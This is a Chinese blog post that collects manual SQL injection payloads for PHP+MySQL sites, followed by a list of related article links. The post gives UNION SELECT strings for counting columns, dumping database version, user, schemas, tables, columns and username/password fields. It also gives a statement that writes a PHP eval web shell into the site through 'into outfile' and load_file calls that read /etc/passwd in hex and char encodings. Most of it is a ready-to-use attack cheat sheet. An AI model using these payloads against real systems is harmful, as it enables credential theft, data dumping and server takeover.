php手工注入语句,PHP+MySQL 手工注入语句大全
我PHP手工太菜了, 无奈只能补下PHP MYSQL手工注射,把收集总结的资料分享下。
暴字段长度
Order by num/*
匹配字段
and 1=1 union select 1,2,3,4,5…….n/*
暴字段位置
and 1=2 union select 1,2,3,4,5……n/*
利用内置函数暴数据库信息
version() database() user()
不用猜解可用字段暴数据库信息(有些网站不适用):
and 1=2 union all select version() /*
and 1=2 union all select database() /*
and 1=2 union all select user() /*
操作系统信息:
and 1=2 union all select @@global.version_compile_os from mysql.user /*
数据库权限:
and ord(mid(user(),1,1))=114 /* 返回正常说明为root
暴库 (mysql>5.0)
Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息
and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1
猜表
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=数据库(十六进制) limit 0(开始的记录,0为第一个开始记录),1(显示1条记录)—
猜字段
and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六进制)limit 0,1
暴密码
and 1=2 Union select 1,2,3,用户名段,5,6,7,密码段,8,9 from 表名 limit 0,1
高级用法(一个可用字段显示两个数据内容):
Union select 1,2,3concat(用户名段,0x3c,密码段),5,6,7,8,9 from 表名 limit 0,1
直接写马(Root权限)
条件:1、知道站点物理路径
2、有足够大的权限(可以用select …. from mysql.user测试)
3、magic_quotes_gpc()=OFF123
select ‘<?php eval($_POST[cmd])?>’ into outfile ‘物理路径’
and 1=2 union all select 一句话HEX值 into outfile ‘路径’
load_file() 常用路径:
1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “
php手工注入语句,PHP+MySQL 手工注入语句大全相关推荐
- SQL注入第二章节MYSQL手工注入
SQL注入第二章节MYSQL手工注入 2.1 SQL注入之sqli-labs环境搭建 一.SQLi-Labs是什么? SQLi-Labs是一个专业的SQL注入练习平台,适用于GET和POST场景,包含 ...
- mysql union as 注入_sql注入入门 之 mysql 常规注入 [ union方式 ]
1,常规数字型 mysql 实例注入点,如下:1https://www.vuln.com/md_materia_profile_view.php?viewid=2 2,依旧先尝试下经典的单引号,如下, ...
- mysql 查询语句 参数,mysql参数化查询语句有关问题
mysql参数化查询语句问题 部分代码如下: using (MySqlConnection conn = new MySqlConnection(connectionString)) { conn.O ...
- pythonsql注入_python使用mysql,sql注入问题
python使用mysql importpymysql conn=pymysql.connect( host= '127.0.0.1', #连接地址 port = 3306, #端口 user = r ...
- 注入学习(3) Mysql+php注入 基于bool和时间的盲注
练习三:Mysql+php 基于bool和时间的盲注 今天要用的函数(详细的直接看链接): left()函数:left()得到字符串左部指定个数的字符 left( string, n ) #strin ...
- mysql50条必看语句,对MySql经常使用语句的全面总结(必看篇)
下面总结的知识点全是经常用的,全都是干货,好好收藏吧. /* 启动MySQL */ net start mysql /* 连接与断开服务器 */ mysql -h 地址 -P 端口 -u 用户名 -p ...
- mysql 4.0手工注入_手工注入——MySQL手工注入实战和分析
前言 今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场.话不多说,咱们直接开始. 判断注入点 通过 ' 和构造 and 1=1 和 and 1=2 查 ...
- mysql报错注入实战_手工注入——MySQL手工注入实战和分析
今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场.话不多说,咱们直接开始. 第一步,判断注入点 通过 ' 和构造 and 1=1 和 and 1=2 ...
- mysql create注入语句_mysql注入总结
作者:L.N. 时间:2012-07-23 博客:lanu.sinaapp.com 目录: 0x00 mysql一般注入(select) 0x01 mysql一般注入(insert.update) 0 ...
最新文章
- 数据结构 -- 散列表
- Windows 10或成为最后一个Windows版本
- Python3 系列之 编程规范篇
- leetcode 在排序数组中查找元素的第一个和最后一个位置
- C编程,随机数,排序
- 【项目经验】如果想在mapper.xml文件中的一个标签中写多条sql语句,则需要在jdbc的配置文件中稍做配置
- python commands_Windows环境下使用python的commands.getstatusoutput
- 02-橄榄球 VS 软件
- JS获取鼠标的坐标和滚动条的位置
- Oracle 临时表
- webpack项目使用eslint建立代码规范
- [WebApi] 捣鼓一个资源管理器--服务器端分割压缩图片
- CSS面试题汇总(三)
- __declspec,__cdecl,__stdcall区别和作用
- 设置下拉菜单的几种方法
- 《HarmonyOS开发 – 小凌派-RK2206开发笔记》第4章 串口应用开发
- Powershell运行脚本异常:无法加载文件...因为在此系统上禁止运行脚本
- QT+OSG/osgEarth编译之四十三:jasper+Qt编译(一套代码、一套框架,跨平台编译,版本:basisjasper-2.0.12)
- 机房监控系统的组成及功能!
- 使用cmake构建工程
热门文章
- NDuiker项目第2天总结
- tf.nn.softmax_cross_entropy_with_logits 和 tf.contrib.legacy_seq2seq.sequence_loss_by_example 的联系与区别
- 【Matlab 控制】求左右特征向量
- Allegro16.6软件布局设计技巧:模块复用
- 基于Quartus II软件FPGA与PC之间的串行通信系统开发(9000+字)
- InstallUtil.exe版本引起安装windows services 服务遇到的问题,System.BadImageFormatException...
- 算法学习之路|住房空置率
- 网络设备主备配置系列3:华为防火墙(路由模式)
- 长亭技术专栏 安全攻防技术分享
- Unity UGUI —— 无限循环List(转载)